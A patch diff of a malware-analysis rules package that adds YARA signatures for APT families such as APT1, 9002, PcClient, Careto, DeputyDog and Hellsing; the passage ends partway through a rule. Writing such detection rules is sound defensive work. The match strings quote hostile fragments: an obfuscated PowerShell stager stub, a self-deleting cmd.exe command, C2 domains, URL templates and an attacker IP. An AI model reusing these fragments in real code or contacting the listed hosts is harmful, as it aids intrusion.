+        $strb1 = "getmail.dll" wide ascii
+        $strb2 = "doCompress" wide ascii
+        $strb3 = "love" wide ascii
+    condition:
+        all of ($stra*) or all of ($strb*)
+}
+
+rule APT1_GDOCUPLOAD
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "name=\"GALX\"" wide ascii
+        $str2 = "User-Agent: Shockwave Flash" wide ascii
+        $str3 = "add cookie failed..." wide ascii
+        $str4 = ",speed=%f" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_Y21K
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "Y29ubmVjdA" wide ascii // connect
+        $2 = "c2xlZXA" wide ascii // sleep
+        $3 = "cXVpdA" wide ascii // quit
+        $4 = "Y21k" wide ascii // cmd
+        $5 = "dW5zdXBwb3J0" wide ascii // unsupport
+    condition:
+        4 of them
+}
+
+rule APT1_WEBC2_YAHOO
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $http1 = "HTTP/1.0" wide ascii
+        $http2 = "Content-Type:" wide ascii
+        $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_UGX
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
+        $exe = "DefWatch.exe" wide ascii
+        $html = "index1.html" wide ascii
+        $cmd1 = "!@#tiuq#@!" wide ascii
+        $cmd2 = "!@#dmc#@!" wide ascii
+        $cmd3 = "!@#troppusnu#@!" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_TOCK
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "InprocServer32" wide ascii
+        $2 = "HKEY_PERFORMANCE_DATA" wide ascii
+        $3 = "<!---[<if IE 5>]id=" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_TABLE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $msg1 = "Fail To Execute The Command" wide ascii
+        $msg2 = "Execute The Command Successfully" wide ascii
+        /*
+	$gif1 = /\w+\.gif/
+	*/
+        $gif2 = "GIF89" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_RAVE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "iniet.exe" wide ascii
+        $2 = "cmd.exe" wide ascii
+        $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii
+        $4 = "Device File System" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_QBP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "2010QBP" wide ascii
+        $2 = "adobe_sl.exe" wide ascii
+        $3 = "URLDownloadToCacheFile" wide ascii
+        $4 = "dnsapi.dll" wide ascii
+        $5 = "urlmon.dll" wide ascii
+    condition:
+        4 of them
+}
+
+rule APT1_WEBC2_HEAD
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "Ready!" wide ascii
+        $2 = "connect ok" wide ascii
+        $3 = "WinHTTP 1.0" wide ascii
+        $4 = "<head>" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_GREENCAT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "reader_sl.exe" wide ascii
+        $2 = "MS80547.bat" wide ascii
+        $3 = "ADR32" wide ascii
+        $4 = "ControlService failed!" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_DIV
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii
+        $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii
+        $3 = "Hello from MFC!" wide ascii
+        $4 = "Microsoft Internet Explorer" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_CSON
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $httpa1 = "/Default.aspx?INDEX=" wide ascii
+        $httpa2 = "/Default.aspx?ID=" wide ascii
+        $httpb1 = "Win32" wide ascii
+        $httpb2 = "Accept: text*/*" wide ascii
+        $exe1 = "xcmd.exe" wide ascii
+        $exe2 = "Google.exe" wide ascii
+    condition:
+        1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
+}
+
+rule APT1_WEBC2_CLOVER
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $msg1 = "BUILD ERROR!" wide ascii
+        $msg2 = "SUCCESS!" wide ascii
+        $msg3 = "wild scan" wide ascii
+        $msg4 = "Code too clever" wide ascii
+        $msg5 = "insufficient lookahead" wide ascii
+        $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii
+        $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii
+    condition:
+        2 of ($msg*) and 1 of ($ua*)
+}
+
+rule APT1_WEBC2_BOLID
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $vm = "VMProtect" wide ascii
+        $http = "http://[c2_location]/[page].html" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_ADSPACE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "<!---HEADER ADSPACE style=" wide ascii
+        $2 = "ERSVC.DLL" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_AUSOV
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "ntshrui.dll" wide ascii
+        $2 = "%SystemRoot%\\System32\\" wide ascii
+        $3 = "<!--DOCHTML" wide ascii
+        $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii
+        $5 = "Ausov" wide ascii
+    condition:
+        4 of them
+}
+
+rule APT1_WARP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $err1 = "exception..." wide ascii
+        $err2 = "failed..." wide ascii
+        $err3 = "opened..." wide ascii
+        $exe1 = "cmd.exe" wide ascii
+        $exe2 = "ISUN32.EXE" wide ascii
+    condition:
+        2 of ($err*) and all of ($exe*)
+}
+
+rule APT1_TARSIP_ECLIPSE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "\\pipe\\ssnp" wide ascii
+        $2 = "toobu.ini" wide ascii
+        $3 = "Serverfile is not bigger than Clientfile" wide ascii
+        $4 = "URL download success" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_TARSIP_MOON
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii
+        $s2 = "URL download success!" wide ascii
+        $s3 = "Kugoosoft" wide ascii
+        $msg1 = "Modify file failed!! So strange!" wide ascii
+        $msg2 = "Create cmd process failed!" wide ascii
+        $msg3 = "The command has not been implemented!" wide ascii
+        $msg4 = "Runas success!" wide ascii
+        $onec1 = "onec.php" wide ascii
+        $onec2 = "/bin/onec" wide ascii
+    condition:
+        1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
+}
+
+rule APT1_payloads
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $pay1 = "rusinfo.exe" wide ascii
+        $pay2 = "cmd.exe" wide ascii
+        $pay3 = "AdobeUpdater.exe" wide ascii
+        $pay4 = "buildout.exe" wide ascii
+        $pay5 = "DefWatch.exe" wide ascii
+        $pay6 = "d.exe" wide ascii
+        $pay7 = "em.exe" wide ascii
+        $pay8 = "IMSCMig.exe" wide ascii
+        $pay9 = "localfile.exe" wide ascii
+        $pay10 = "md.exe" wide ascii
+        $pay11 = "mdm.exe" wide ascii
+        $pay12 = "mimikatz.exe" wide ascii
+        $pay13 = "msdev.exe" wide ascii
+        $pay14 = "ntoskrnl.exe" wide ascii
+        $pay15 = "p.exe" wide ascii
+        $pay16 = "otepad.exe" wide ascii
+        $pay17 = "reg.exe" wide ascii
+        $pay18 = "regsvr.exe" wide ascii
+        $pay19 = "runinfo.exe" wide ascii
+        $pay20 = "AdobeUpdate.exe" wide ascii
+        $pay21 = "inetinfo.exe" wide ascii
+        $pay22 = "svehost.exe" wide ascii
+        $pay23 = "update.exe" wide ascii
+        $pay24 = "NTLMHash.exe" wide ascii
+        $pay25 = "wpnpinst.exe" wide ascii
+        $pay26 = "WSDbg.exe" wide ascii
+        $pay27 = "xcmd.exe" wide ascii
+        $pay28 = "adobeup.exe" wide ascii
+        $pay29 = "0830.bin" wide ascii
+        $pay30 = "1001.bin" wide ascii
+        $pay31 = "a.bin" wide ascii
+        $pay32 = "ISUN32.EXE" wide ascii
+        $pay33 = "AcroRD32.EXE" wide ascii
+        $pay34 = "INETINFO.EXE" wide ascii
+    condition:
+        1 of them
+}
+
+
+rule APT1_RARSilent_EXE_PDF
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $winrar1 = "WINRAR.SFX" wide ascii
+        /*
+        $winrar2 = ";The comment below contains SFX script commands" wide ascii
+        $winrar3 = "Silent=1" wide ascii
+	*/
+
+        /*$str1 = /Setup=[\s\w\"]+\.(exe|pdf|doc)/
+	*/
+        $str2 = "Steup=\"" wide ascii
+    condition:
+        all of ($winrar*) and 1 of ($str*)
+}
+
+rule APT1_aspnetreport
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $url = "aspnet_client/report.asp" wide ascii
+        $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii
+    condition:
+        $url and $param and APT1_payloads
+}
+
+rule APT1_Revird_svc
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $dll1 = "nwwwks.dll" wide ascii
+        $dll2 = "rdisk.dll" wide ascii
+        $dll3 = "skeys.dll" wide ascii
+        $dll4 = "SvcHost.DLL.log" wide ascii
+        $svc1 = "InstallService" wide ascii
+        $svc2 = "RundllInstallA" wide ascii
+        $svc3 = "RundllUninstallA" wide ascii
+        $svc4 = "ServiceMain" wide ascii
+        $svc5 = "UninstallService" wide ascii
+    condition:
+        1 of ($dll*) and 2 of ($svc*)
+}
+
+rule APT1_dbg_mess
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $dbg1 = "Down file ok!" wide ascii
+        $dbg2 = "Send file ok!" wide ascii
+        $dbg3 = "Command Error!" wide ascii
+        $dbg4 = "Pls choose target first!" wide ascii
+        $dbg5 = "Alert!" wide ascii
+        $dbg6 = "Pls press enter to make sure!" wide ascii
+        $dbg7 = "Are you sure to " wide ascii
+    condition:
+        4 of them and APT1_payloads
+}
+
+rule APT1_known_malicious_RARSilent
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "Analysis And Outlook.doc\"" wide ascii
+        $str2 = "North Korean launch.pdf\"" wide ascii
+        $str3 = "Dollar General.doc\"" wide ascii
+        $str4 = "Dow Corning Corp.pdf\"" wide ascii
+    condition:
+        1 of them and APT1_RARSilent_EXE_PDF
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/APT3102.yara remnux-rules-0.0.4/yara.old/APT3102.yara
--- remnux-rules-0.0.3/yara.old/APT3102.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT3102.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,36 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT3102Code : APT3102 Family 
+{
+    meta:
+        description = "3102 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 }
+  
+    condition:
+        any of them
+}
+
+rule APT3102Strings : APT3102 Family
+{
+    meta:
+        description = "3102 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "rundll32_exec.dll\x00Update"
+        // this is in the encrypted code - shares with 9002 variant
+        //$ = "POST http://%ls:%d/%x HTTP/1.1"
+        
+    condition:
+       any of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT9002.yara remnux-rules-0.0.4/yara.old/APT9002.yara
--- remnux-rules-0.0.3/yara.old/APT9002.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT9002.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,71 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT9002Code : APT9002 Family 
+{
+    meta:
+        description = "9002 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        // start code block
+        $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 }
+        // decryption from other variant with multiple start threads
+        $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC }
+  
+    condition:
+        any of them
+}
+
+rule APT9002Strings : APT9002 Family
+{
+    meta:
+        description = "9002 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "POST http://%ls:%d/%x HTTP/1.1"
+        $ = "%%TEMP%%\\%s_p.ax" wide ascii
+        $ = "%TEMP%\\uid.ax" wide ascii
+        $ = "%%TEMP%%\\%s.ax" wide ascii
+        // also triggers on surtr $ = "mydll.dll\x00DoWork"
+        $ = "sysinfo\x00sysbin01"
+        $ = "\\FlashUpdate.exe"
+        
+    condition:
+       any of them
+}
+
+rule APT9002 : Family
+{
+    meta:
+        description = "9002"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        APT9002Code or APT9002Strings
+}
+
+rule FE_APT_9002 : RAT
+{
+    meta:
+        Author      = "FireEye Labs"
+        Date        = "2013/11/10"
+        Description = "Strings inside"
+        Reference   = "Useful link"
+
+    strings:
+        $mz = { 4d 5a }
+        $a = "rat_UnInstall" wide ascii
+
+    condition:
+        ($mz at 0) and $a
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/APT_c16.yara remnux-rules-0.0.4/yara.old/APT_c16.yara
--- remnux-rules-0.0.3/yara.old/APT_c16.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_c16.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,98 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule apt_c16_win_memory_pcclient 
+{
+  meta:
+    author = "@dragonthreatlab "
+    md5 = "ec532bbe9d0882d403473102e9724557"
+    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+  strings:
+    $str1 = "Kill You" ascii
+    $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii
+    $str3 = "%4.2f  KB" ascii
+    $encodefunc = {8A 08 32 CA 02 CA 88 08 40 4E 75 F4}  
+  condition:
+    all of them
+}
+
+rule apt_c16_win_disk_pcclient 
+{
+  meta:
+    author = "@dragonthreatlab "
+    md5 = "55f84d88d84c221437cd23cdbc541d2e"
+    description = "Encoded version of pcclient found on disk"
+  strings:
+    $header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
+  condition:
+    $header at 0
+}
+
+rule apt_c16_win32_dropper 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "ad17eff26994df824be36db246c8fb6a"
+    description = "APT malware used to drop PcClient RAT"
+  strings:
+    $mz = {4D 5A}
+    $str1 = "clbcaiq.dll" ascii
+    $str2 = "profapi_104" ascii
+    $str3 = "/ShowWU" ascii
+    $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
+    $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
+  condition:
+    $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_swisyn 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "a6a18c846e5179259eba9de238f67e41"
+    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+  strings:
+    $mz = {4D 5A}
+    $str1 = "/ShowWU" ascii
+    $str2 = "IsWow64Process"
+    $str3 = "regsvr32 "
+    $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
+  condition:
+    $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_wateringhole 
+{
+  meta:
+    author = "@dragonthreatlab "
+    description = "Detects code from APT wateringhole"
+  strings:
+    $str1 = "function runmumaa()"
+    $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
+    $str3 = "function MoSaklgEs7(k)"
+  condition:
+    any of ($str*)
+}
+
+rule apt_c16_win64_dropper
+{
+    meta:
+        Author      = "@dragonthreatlab"
+        Date        = "2015/01/11" 
+        Description = "APT malware used to drop PcClient RAT"
+        Reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+
+    strings:
+        $mz = { 4D 5A }
+        $str1 = "clbcaiq.dll" ascii
+        $str2 = "profapi_104" ascii
+        $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii
+        $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC }
+
+    condition:
+        $mz at 0 and all of ($str*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_Careto.yara remnux-rules-0.0.4/yara.old/APT_Careto.yara
--- remnux-rules-0.0.3/yara.old/APT_Careto.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_Careto.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,59 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Careto_SGH {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto SGH component signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		$m1 = "PGPsdkDriver" ascii wide fullword
+		$m2 = "jpeg1x32" ascii wide fullword
+		$m3 = "SkypeIE6Plugin" ascii wide fullword
+		$m4 = "CDllUninstall" ascii wide fullword
+	condition:
+		2 of them
+}
+
+rule Careto_OSX_SBD {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto OSX component signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		/* XORed "/dev/null strdup() setuid(geteuid())" */
+		$1 = {FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12}
+	condition:
+		all of them
+}
+
+rule Careto_CnC {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto CnC communication signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		$1 = "cgi-bin/commcgi.cgi" ascii wide
+		$2 = "Group" ascii wide
+		$3 = "Install" ascii wide
+		$4 = "Bn" ascii wide
+	condition:
+		all of them
+}
+
+rule Careto_CnC_domains {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto known command and control domains"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		$1 = "linkconf.net" ascii wide nocase
+		$2 = "redirserver.net" ascii wide nocase
+		$3 = "swupdt.com" ascii wide nocase
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/APT_DeputyDog_Fexel.yara remnux-rules-0.0.4/yara.old/APT_DeputyDog_Fexel.yara
--- remnux-rules-0.0.3/yara.old/APT_DeputyDog_Fexel.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_DeputyDog_Fexel.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,36 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_DeputyDog_Fexel
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$180 = "180.150.228.102" wide ascii
+	$0808cmd = {25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21}
+	$cUp = "Upload failed! [Remote error code:" nocase wide ascii
+	$DGGYDSYRL = {00 44 47 47 59 44 53 59 52 4C 00}
+	$GDGSYDLYR = "GDGSYDLYR_%" wide ascii
+condition:
+	any of them
+}
+
+rule APT_DeputyDog
+{
+    meta:
+        Author      = "FireEye Labs"
+        Date        = "2013/09/21"
+        Description = "detects string seen in samples used in 2013-3893 0day attacks"
+        Reference   = "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
+
+    strings:
+        $mz = {4d 5a}
+        $a = "DGGYDSYRL"
+
+    condition:
+        ($mz at 0) and $a
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara.old/APT_Hellsing.yara remnux-rules-0.0.4/yara.old/APT_Hellsing.yara
--- remnux-rules-0.0.3/yara.old/APT_Hellsing.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT_Hellsing.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,159 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule apt_hellsing_implantstrings : PE
+{ 
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing implants"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings: 
+		$mz="MZ"
+
+		$a1="the file uploaded failed !" 
+		$a2="ping 127.0.0.1"
+		
+		$b1="the file downloaded failed !" 
+		$b2="common.asp"
+		
+		$c="xweber_server.exe" 
+		$d="action="
+
+		$debugpath1="d:\\Hellsing\\release\\msger\\" nocase 
+		$debugpath2="d:\\hellsing\\sys\\xrat\\" nocase 
+		$debugpath3="D:\\Hellsing\\release\\exe\\" nocase 
+		$debugpath4="d:\\hellsing\\sys\\xkat\\" nocase 
+		$debugpath5="e:\\Hellsing\\release\\clare" nocase 
+		$debugpath6="e:\\Hellsing\\release\\irene\\" nocase 
+		$debugpath7="d:\\hellsing\\sys\\irene\\" nocase
+
+		$e="msger_server.dll"
+		$f="ServiceMain"
+
+	condition:
+		($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000
+}
+
+rule apt_hellsing_installer : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing xweber/msger installers"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
+
+	strings: 
+		$mz="MZ"
+		
+		$cmd="cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
+		
+		$a1="xweber_install_uac.exe"
+		$a2="system32\\cmd.exe" wide
+		$a4="S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=" 
+		$a5="S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
+		$a7="vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==" 
+		$a8="vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI" $a9="C:\\Windows\\System32\\sysprep\\sysprep.exe" wide 
+		$a10="%SystemRoot%\\system32\\cmd.exe" wide 
+		$a11="msger_install.dll"
+		$a12={00 65 78 2E 64 6C 6C 00}
+
+	condition:
+		($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000
+}
+
+rule apt_hellsing_proxytool : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing proxy testing tool"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
+
+	strings: 
+		$mz="MZ"
+		$a1="PROXY_INFO: automatic proxy url => %s " 
+		$a2="PROXY_INFO: connection type => %d " 
+		$a3="PROXY_INFO: proxy server => %s " 
+		$a4="PROXY_INFO: bypass list => %s " 
+		$a5="InternetQueryOption failed with GetLastError() %d" 
+		$a6="D:\\Hellsing\\release\\exe\\exe\\" nocase
+
+	condition:
+		($mz at 0) and (2 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_xkat : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing xKat tool"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings:
+		$mz="MZ"
+		$a1="\\Dbgv.sys"
+		$a2="XKAT_BIN"
+		$a3="release sys file error."
+		$a4="driver_load error. "
+		$a5="driver_create error."
+		$a6="delete file:%s error."
+		$a7="delete file:%s ok."
+		$a8="kill pid:%d error."
+		$a9="kill pid:%d ok."
+		$a10="-pid-delete"
+		$a11="kill and delete pid:%d error."
+		$a12="kill and delete pid:%d ok."
+
+	condition:
+		($mz at 0) and (6 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_msgertype2 : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing msger type 2 implants"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings:
+		$mz="MZ"
+		$a1="%s\\system\\%d.txt"
+		$a2="_msger"
+		$a3="http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
+		$a4="http://%s/data/%s.1000001000"
+		$a5="/lib/common.asp?action=user_upload&file="
+		$a6="%02X-%02X-%02X-%02X-%02X-%02X"
